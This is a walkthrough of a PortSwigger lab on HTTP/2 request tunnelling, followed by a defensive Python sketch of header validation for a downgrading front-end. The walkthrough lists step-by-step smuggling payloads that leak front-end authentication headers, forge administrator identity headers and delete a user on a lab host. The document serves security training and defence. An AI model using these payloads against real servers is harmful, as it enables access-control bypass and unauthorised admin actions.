Expert - H2 request tunnelling - bypassing access controls
# Lab: Bypassing access controls via HTTP/2 request tunnelling
# Problem statement
This lab is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests and fails to adequately sanitize incoming header names.
To solve the lab, access the admin panel at /admin as the administrator user and delete the user carlos.
The front-end server does not reuse its connection to the back-end, so it is not vulnerable to classic request smuggling attacks. However, it is still vulnerable to request tunnelling.
Hint
The front-end server appends a series of client authentication headers to incoming requests. You need to find a way to leak these headers.
Lab: Expert - Bypassing access controls via HTTP/2 request tunnelling
Link: https://portswigger.net/web-security/request-smuggling/advanced/request-tunnelling/lab-request-smuggling-h2-bypass-access-controls-via-request-tunnelling
# Walkthrough
(Only screenshots for now; the text will be filled in when there is time.)
Click "ACCESS THE LAB" to enter the lab.
```
: x\r\n
\r\n
\r\n
GET / HTTP/1.1
Host: ...
Foo
```

↓↓↓

```
HEAD / HTTP/2
Host: ...
Foo: x
GET / HTTP/1.1
Host: ...
Foo: y
```
```
Content-Length: 8425
Content-Length: 3299
```
```
: x\r\n
\r\n
\r\n
GET /?search=carsaid HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
s=
```

↓↓↓

```
HEAD /?search=carsaid HTTP/2
Host: ...
Foo: x
GET /?search=carsaid HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
s=: y
```
```
: x\r\n
\r\n
\r\n
POST / HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
search=
```

↓↓↓

```
HEAD /?search=carsaid HTTP/2
Host: ...
Foo: x
POST / HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
search=: y
```
```
: x\r\n
\r\n
\r\n
POST / HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
search=
```

Front-end headers leaked in the response:

```
X-SSL-VERIFIED: 0
X-SSL-CLIENT-CN: null
X-FRONTEND-KEY: 2883079989245042
```
```
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 0
X-SSL-CLIENT-CN: null
X-FRONTEND-KEY: 2883079989245042
Bar: y
```
```
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
Bar: y
```
```
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
y
```
```
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
Bar: y
```
```
: x\r\n
\r\n
\r\n
GET /admin/delete?username=carlos HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042\r\n
\r\n
```

↓↓↓

```
HEAD /?search=carsaid HTTP/2
Host: ...
Foo: x
GET /admin/delete?username=carlos HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
```
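As an added example (not the lab's own code, nor PortSwigger's), the following Python models the two checks a downgrading front-end should apply before serialising client fields into HTTP/1.1: it rejects field names and values that are not valid under RFC 9113 section 8.2.1, which blocks the CRLF-laden header name used throughout the walkthrough, and it drops any client-supplied copy of the front-end's own X-SSL-VERIFIED / X-SSL-CLIENT-CN / X-FRONTEND-KEY headers before appending its own. The drop-rather-than-reject policy for those headers and the host names in the comments are assumptions.

```python
import re

# Added example: a simplified model of an HTTP/2-to-HTTP/1.1 downgrading
# front-end. Field-name rule from RFC 9113 section 8.2.1: lowercase token
# characters only, so a name such as the lab's
# "foo: x\r\n\r\n\r\nGET / HTTP/1.1\r\n..." (colon, space, CR, LF) is malformed.
NAME_RE = re.compile(r"[!#$%&'*+\-.^_`|~0-9a-z]+")
# Field-value rule: no NUL, CR or LF, and no leading or trailing SP / HTAB.
VALUE_BAD = re.compile(r"[\x00\r\n]")
# Headers this front-end owns (the three the lab reveals). A client-supplied
# copy is dropped so it cannot be forged (assumed policy; rejecting also works).
FRONTEND_OWNED = {"x-ssl-verified", "x-ssl-client-cn", "x-frontend-key"}


def check_field(name: str, value: str):
    """Return None if the field is valid, otherwise a short reason string."""
    if not NAME_RE.fullmatch(name):
        return f"malformed header name {name!r}"
    if VALUE_BAD.search(value) or value != value.strip(" \t"):
        return f"malformed value for {name!r}"
    return None


def downgrade_to_h1(h2_fields, frontend_fields):
    """Serialise HTTP/2 fields (list of (name, value), pseudo-headers first)
    into the HTTP/1.1 request text forwarded to the back-end, appending
    frontend_fields (dict) last so the client cannot shadow them.
    Raises ValueError on any malformed client field."""
    pseudo = {n: v for n, v in h2_fields if n.startswith(":")}
    lines = [f"{pseudo[':method']} {pseudo[':path']} HTTP/1.1",
             f"Host: {pseudo[':authority']}"]
    for name, value in h2_fields:
        if name.startswith(":"):
            continue  # pseudo-headers were consumed above
        reason = check_field(name, value)
        if reason:
            raise ValueError(reason)  # would stop the tunnelling payload
        if name in FRONTEND_OWNED:
            continue  # client-supplied copy of a trusted header: drop it
        lines.append(f"{name}: {value}")
    for name, value in frontend_fields.items():
        lines.append(f"{name}: {value}")
    return "\r\n".join(lines) + "\r\n\r\n"
```

Uppercase names such as `Foo` are also rejected, because HTTP/2 requires lowercase field names and accepting them would let a client bypass the `FRONTEND_OWNED` comparison by case.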